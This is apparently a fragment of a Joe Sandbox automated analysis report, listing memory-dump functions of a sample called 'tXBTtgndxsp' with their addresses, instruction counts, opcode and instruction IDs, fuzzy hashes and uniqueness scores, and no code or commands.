                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3698767959.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_fbd000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction ID: 827b120a278f8d688b3fe9168a31b302b41ddf71de42252eeedeefdadc4b2b0f
                                                        • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction Fuzzy Hash: 9911DD75908284CFDB11CF14D9C4B15BFA2FB84324F24C6A9E8494B656C33AD84ADF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00FBD207 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3698767959.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_fbd000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8fbc9ecfa64d6cd6169a34e6f0bd23febabaae063db22b202cb29621ee734798
                                                        • Instruction ID: e4ede75ad5e3fca7d3e9944ea7b23a0407ecae9fcc59b227da4d9a9a26f5e16a
                                                        • Opcode Fuzzy Hash: 8fbc9ecfa64d6cd6169a34e6f0bd23febabaae063db22b202cb29621ee734798
                                                        • Instruction Fuzzy Hash: AB119075904284DFDB11CF10D5C4B55BB61FB84324F24C6A9DC494B656C33AD806DF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00FBD3B7 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3698767959.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_fbd000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction ID: 8c02d13d547848cdd0b511c4afa09e0dbff70d57726da7452cc9dce6855c1561
                                                        • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                        • Instruction Fuzzy Hash: BF119075904244DFCB15CF10D5C4B55BFA1FB44328F24C6A9D8494B656C33AE84ADF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01011498 Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 032d231b4bee9263dc761b19ef144df25d59e1c23878a212083e4b3d01ae33ee
                                                        • Instruction ID: 9765e2f1ea718fe29b0f8899d2dad317d32d1d058e7f55b7ed319cea5a385554
                                                        • Opcode Fuzzy Hash: 032d231b4bee9263dc761b19ef144df25d59e1c23878a212083e4b3d01ae33ee
                                                        • Instruction Fuzzy Hash: 88015231E00216DFCF65EFBC84501AE7BF5EF48250F1404BAE985E7309EA39C8828B95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01019F88 Relevance: .0, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6189b2fa61f15c7366a26502e0d0d1298fd9344709993701836ae9337b503a32
                                                        • Instruction ID: 3de63ae213623cc624a548b8de911c483f985e395b185870e4b89995e2b8f1a4
                                                        • Opcode Fuzzy Hash: 6189b2fa61f15c7366a26502e0d0d1298fd9344709993701836ae9337b503a32
                                                        • Instruction Fuzzy Hash: 2101D830E002048BDB10DF69DD457CABBA5FF85310F54C164E8085F29ADBB4ED05C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010187D0 Relevance: .0, Instructions: 40COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2cc18d5c536bfae89442f64e923a244a349d6ede7b03f2b08bb7380bd4d3e8de
                                                        • Instruction ID: b3400f8aa8ae086416238189bb5346007b46d4318cc839cbc488e8377df991d3
                                                        • Opcode Fuzzy Hash: 2cc18d5c536bfae89442f64e923a244a349d6ede7b03f2b08bb7380bd4d3e8de
                                                        • Instruction Fuzzy Hash: F401B138900248AFCB41FB78E8A169DBFF1EF81310B1086A5D004DB199EB306E19DB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01011524 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9fe6f6555bc1fedee8aa04410d7a12f49e33416e0745606b25ac8cf180aefda9
                                                        • Instruction ID: 6b6ad1059f45664b72410beaad589aae8c8b686768c6073ad26c73c177452ce2
                                                        • Opcode Fuzzy Hash: 9fe6f6555bc1fedee8aa04410d7a12f49e33416e0745606b25ac8cf180aefda9
                                                        • Instruction Fuzzy Hash: 5AF0F636A04110DFDB268BB894511AC7BB1EB9911171C00DBE9C6DB219D639D4428711
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01017EA8 Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4f7f12c25de8c099493b152d3c3d127043d4c8de440de3227806cbccc0027ecd
                                                        • Instruction ID: 3d28f33b013ac1af47c45117108290d6bfa084336d4f2d8c77fd0d5e46002371
                                                        • Opcode Fuzzy Hash: 4f7f12c25de8c099493b152d3c3d127043d4c8de440de3227806cbccc0027ecd
                                                        • Instruction Fuzzy Hash: 1EF0B239B401088FC704DB69D598B6D7BF2EF88711F5144A8E9069B3A4DF35AD02CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 010187E0 Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3699261249.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_1010000_tXBTtgndxsp.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 43669d837c79207cc4b61345b0f893fd6acd36dbe885ed6eb93bea381d607a01
                                                        • Instruction ID: 6d91697dc292d124e747c103d836ced4b9b0b693ced63b27f20461c7e0f19cc2
                                                        • Opcode Fuzzy Hash: 43669d837c79207cc4b61345b0f893fd6acd36dbe885ed6eb93bea381d607a01
                                                        • Instruction Fuzzy Hash: CBF01D38A00208AFDB41FBB4E85169DBBB1AB80304F5096A8D404DB298EB316E15CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%